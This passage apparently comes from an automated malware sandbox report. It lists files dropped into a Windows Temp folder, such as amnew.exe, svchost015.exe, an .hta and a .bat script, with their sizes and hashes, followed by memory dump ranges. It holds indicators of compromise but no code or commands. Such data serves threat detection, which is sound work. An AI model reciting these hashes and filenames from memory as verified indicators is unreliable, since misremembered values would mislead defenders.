                                              SHA512

                                              ddac4c7ba810c8f4c93f931bd3f04f80ca687248b7a2ea8a92b501d8f055d43737d1c3e8e7b7b18573174d708f567ad75ba6606464c37f51a896f22f068ecd92

                                            • C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe

                                              Filesize

                                              429KB

                                              MD5

                                              22892b8303fa56f4b584a04c09d508d8

                                              SHA1

                                              e1d65daaf338663006014f7d86eea5aebf142134

                                              SHA256

                                              87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

                                              SHA512

                                              852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

                                            • C:\Users\Admin\AppData\Local\Temp\10352670101\2cd3f8b602.exe

                                              Filesize

                                              4.4MB

                                              MD5

                                              5c677ee4e1d68e32a4837d1ec6e6adc5

                                              SHA1

                                              144efd3a8754693d4b623698f933e88c4905545b

                                              SHA256

                                              d699cafd4fb715ec0ec9599890d931b5c269dd4ce7e455b053df6df7b9fe1e10

                                              SHA512

                                              a798ab240464a210d25e7b63369672325f4b9318ec5ca9c18481a57ce54bae15dce3bfa4676ef07da7275c77499102b071bb0fd85546de49d40b8dc821684713

                                            • C:\Users\Admin\AppData\Local\Temp\10352680101\0b89d01f90.exe

                                              Filesize

                                              1.1MB

                                              MD5

                                              96fa728730da64d7d6049c305c40232c

                                              SHA1

                                              3fd03c4f32e3f9dbcc617507a7a842afb668c4de

                                              SHA256

                                              28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

                                              SHA512

                                              c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

                                            • C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe

                                              Filesize

                                              1.2MB

                                              MD5

                                              f2eccc9bcf9fc3b0a39f53d411cfc30d

                                              SHA1

                                              684785f4b022fdb5f35dd2c065c63564d8856730

                                              SHA256

                                              8ada623f6a1b763a732c2c233c7b273541acabb23fba3bbff9135fb15bccbcfb

                                              SHA512

                                              2fcb35616b998f310fc9ba30b460e5569d93770fea5b88929a20380aec486c3645fdae58099dee2148bd335a288438473bb4707356c732cea17ddcf0e40c2fd0

                                            • C:\Users\Admin\AppData\Local\Temp\4827.tmp\4828.tmp\4829.bat

                                              Filesize

                                              1KB

                                              MD5

                                              e5ddb7a24424818e3b38821cc50ee6fd

                                              SHA1

                                              97931d19f71b62b3c8a2b104886a9f1437e84c48

                                              SHA256

                                              4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                              SHA512

                                              450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                            • C:\Users\Admin\AppData\Local\Temp\K2GC9cBIz.hta

                                              Filesize

                                              717B

                                              MD5

                                              bbf605836de1daf961cbae5ec33ca477

                                              SHA1

                                              a0915ac7fc06e465ba3dba1ffb8c3d97954fbf5b

                                              SHA256

                                              74dfc868d6a8fe80d0437ef11c2e069f7186faae6cf4812a2f5b61ab2017bc1d

                                              SHA512

                                              5d3d843e39f7b33ec84cb5f80e1a48de798a6701b126c382b517eaf6d55be840df84bc7de390d5964aa069d8654ecae1791e4e508fce8c9f440e2270b9cea7b3

                                            • C:\Users\Admin\AppData\Local\Temp\Tar7086.tmp

                                              Filesize

                                              183KB

                                              MD5

                                              109cab5505f5e065b63d01361467a83b

                                              SHA1

                                              4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

                                              SHA256

                                              ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

                                              SHA512

                                              753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                                            • \Users\Admin\AppData\Local\TempFTQ5Y2IRWFL0ED01RBCCNCGLKYG0MC78.EXE

                                              Filesize

                                              1.8MB

                                              MD5

                                              5031c08d571c8e312dc8c1244c27bc7b

                                              SHA1

                                              d541ded909b767ebc9f7ee3122303877e5aaafb9

                                              SHA256

                                              c9992d1efc2433f9f0459e651b53947f2e6a8e86de1354990158a61d73a88b93

                                              SHA512

                                              02a04f32f4b15e1d925783a65d521f228937721f44e8d618d83419b3ddda054a0f3ccec97350333a2bf5935588d50013a8bf182a5b0e4381b97b4abdb140bd40

                                            • \Users\Admin\AppData\Local\Temp\22.exe

                                              Filesize

                                              88KB

                                              MD5

                                              89ccc29850f1881f860e9fd846865cad

                                              SHA1

                                              d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                              SHA256

                                              4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                              SHA512

                                              0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                            • \Users\Admin\AppData\Local\Temp\svchost015.exe

                                              Filesize

                                              2.9MB

                                              MD5

                                              b826dd92d78ea2526e465a34324ebeea

                                              SHA1

                                              bf8a0093acfd2eb93c102e1a5745fb080575372e

                                              SHA256

                                              7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                                              SHA512

                                              1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                                            • memory/1000-266-0x0000000000400000-0x0000000000CE5000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/1000-226-0x0000000000400000-0x0000000000CE5000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/1656-340-0x00000000012F0000-0x0000000001356000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/1656-350-0x0000000000280000-0x00000000002A6000-memory.dmp

                                              Filesize

                                              152KB

                                            • memory/1744-368-0x0000000000400000-0x0000000000CE5000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/1744-385-0x0000000000400000-0x0000000000CE5000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/2080-319-0x0000000000400000-0x0000000000687000-memory.dmp

                                              Filesize

                                              2.5MB

                                            • memory/2108-294-0x0000000006A40000-0x0000000007325000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/2108-23-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-341-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-45-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-46-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-103-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-296-0x0000000006A40000-0x0000000007325000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/2108-190-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-293-0x0000000000D00000-0x00000000011C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2108-227-0x0000000006A40000-0x0000000007325000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/2108-225-0x0000000006A40000-0x0000000007325000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/2188-367-0x0000000004810000-0x00000000050F5000-memory.dmp

                                              Filesize

                                              8.9MB

                                            • memory/2320-9-0x0000000006410000-0x00000000068D9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2728-25-0x0000000000100000-0x00000000005C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2728-11-0x0000000000100000-0x00000000005C9000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/2728-22-0x0000000007080000-0x0000000007549000-memory.dmp

                                              Filesize

                                              4.8MB

                                            • memory/3052-324-0x0000000010000000-0x000000001001C000-memory.dmp

                                              Filesize

                                              112KB

                                            • memory/3052-250-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-262-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-265-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-260-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-321-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-258-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-256-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-254-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB

                                            • memory/3052-252-0x0000000000400000-0x000000000042E000-memory.dmp

                                              Filesize

                                              184KB